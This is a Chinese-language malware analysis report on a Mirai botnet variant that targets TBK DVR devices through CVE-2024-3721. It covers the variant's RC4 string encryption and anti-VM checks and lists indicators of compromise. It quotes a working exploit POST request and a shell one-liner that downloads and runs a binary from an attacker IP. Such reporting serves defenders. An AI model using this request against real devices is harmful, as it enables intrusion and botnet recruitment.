新Mirai僵尸网络活动针对DVR设备

利用已知安全漏洞在易受攻击系统上部署僵尸网络是一个广为人知的问题。众多自动化僵尸程序持续扫描互联网上服务器和设备中的已知漏洞，特别是运行流行服务的设备。这些僵尸程序通常携带针对HTTP服务的远程代码执行（RCE）漏洞利用，允许攻击者在GET或POST请求中嵌入Linux命令。

我们最近在蜜罐服务中观察到利用CVE-2024-3721漏洞部署僵尸程序的尝试。该僵尸程序变种被证实是臭名昭著的Mirai僵尸网络的一部分，针对基于DVR的监控系统。DVR设备设计用于记录摄像机数据，被众多制造商广泛使用并可远程管理。本文我们将描述新Mirai僵尸程序的功能及其改进的感染向量。

漏洞利用

在审查Linux蜜罐系统日志时，我们注意到一个与CVE-2024-3721相关的异常请求行。该漏洞允许通过特定POST请求在TBK DVR设备上未经授权执行系统命令：

1

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1

POST请求包含恶意命令，这是一个单行shell脚本，用于在受感染机器上下载并执行ARM32二进制文件：

1

cd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk

通常，僵尸程序感染涉及shell脚本先调查目标机器以确定其架构并选择相应的二进制文件。但在本例中，由于攻击专门针对仅支持ARM32二进制文件的设备，侦察阶段变得不必要。

恶意软件植入 – Mirai变种

Mirai僵尸网络源代码近十年前已在互联网上公开，此后被各种网络犯罪组织调整和修改，以创建主要专注于DDoS和资源劫持的大规模僵尸网络。

该DVR僵尸程序同样基于Mirai源代码，但包含了不同功能，如使用RC4的字符串加密、反虚拟机检查和反模拟技术。我们已在多篇文章中介绍过Mirai，因此将重点分析此特定变种的新功能。

数据解密

此变种中的数据解密例程实现为简单的RC4算法。RC4密钥使用XOR加密。密钥解密后，我们获得其值：6e7976666525a97639777d2d7f303177。

解密的RC4密钥用于解密字符串。每段数据解密后，会插入到自定义DataDecrypted结构的向量中，这是一个简单的字符串列表：

（数据解密例程图示）

全局链表包含解密数据，在恶意软件需要特定字符串时被访问。

（添加解密字符串到全局列表图示）

反虚拟机和反模拟

为检测是否在虚拟机或QEMU中运行，恶意软件会列出所有进程，直到找到任何提及VMware或QEMU-arm的内容。在Linux上，列出运行进程只需打开/proc目录（proc文件系统）。

每个进程ID（PID）都有其自己的文件夹，包含有用信息，如描述启动进程所用命令的cmdline。利用此信息，恶意软件验证是否有任何进程的命令行中包含VMware或QEMU-arm。

（进程检查图示）

该植入程序还基于硬编码的允许目录列表，验证僵尸进程是否在预期目录外运行：

（允许目录图示）

这些检查成功完成后，Mirai将继续正常执行，准备让易受攻击设备接收操作员的命令。

感染统计数据

根据我们的遥测数据，大多数受感染受害者位于中国、印度、埃及、乌克兰、俄罗斯、土耳其和巴西等国家。准确确定全球易受攻击和受感染设备的数量具有挑战性。然而，通过分析公开来源，我们已识别出超过50,000台在线暴露的DVR设备，表明攻击者有大量机会针对未打补丁的易受攻击设备。

结论

利用未打补丁的IoT设备和服务器中的已知安全漏洞，以及针对基于Linux系统的恶意软件的广泛使用，导致大量僵尸程序持续扫描互联网以感染设备。

此类僵尸程序的主要目标是执行使网站和服务不堪重负的攻击（DDoS攻击）。大多数这些僵尸程序在设备重启后不会保持活动状态，因为某些设备固件不允许更改文件系统。为防范此类感染，我们建议在安全补可用后立即更新易受攻击的设备。另一件要考虑的事情是，如果您的设备确实易受攻击且暴露，请进行出厂重置。

所有卡巴斯基产品都将此威胁检测为HEUR:Backdoor.Linux.Mirai和HEUR:Backdoor.Linux.Gafgyt。

危害指标（IOC）

基于主机的（MD5哈希）

011a406e89e603e93640b10325ebbdc8
24fd043f9175680d0c061b28a2801dfc
29b83f0aae7ed38d27ea37d26f3c9117
2e9920b21df472b4dd1e8db4863720bf
3120a5920f8ff70ec6c5a45d7bf2acc8
3c2f6175894bee698c61c6ce76ff9674
45a41ce9f4d8bb2592e8450a1de95dcc
524a57c8c595d9d4cd364612fe2f057c
74dee23eaa98e2e8a7fc355f06a11d97
761909a234ee4f1d856267abe30a3935
7eb3d72fa7d730d3dbca4df34fe26274
8a3e1176cb160fb42357fa3f46f0cbde
8d92e79b7940f0ac5b01bbb77737ca6c
95eaa3fa47a609ceefa24e8c7787bd99
96ee8cc2edc8227a640cef77d4a24e83
aaf34c27edfc3531cf1cf2f2e9a9c45b
ba32f4eef7de6bae9507a63bde1a43aa

IP地址

116.203.104[.]203
130.61.64[.]122
161.97.219[.]84
130.61.69[.]123
185.84.81[.]194
54.36.111[.]116
192.3.165[.]37
162.243.19[.]47
63.231.92[.]27
80.152.203[.]134
42.112.26[.]36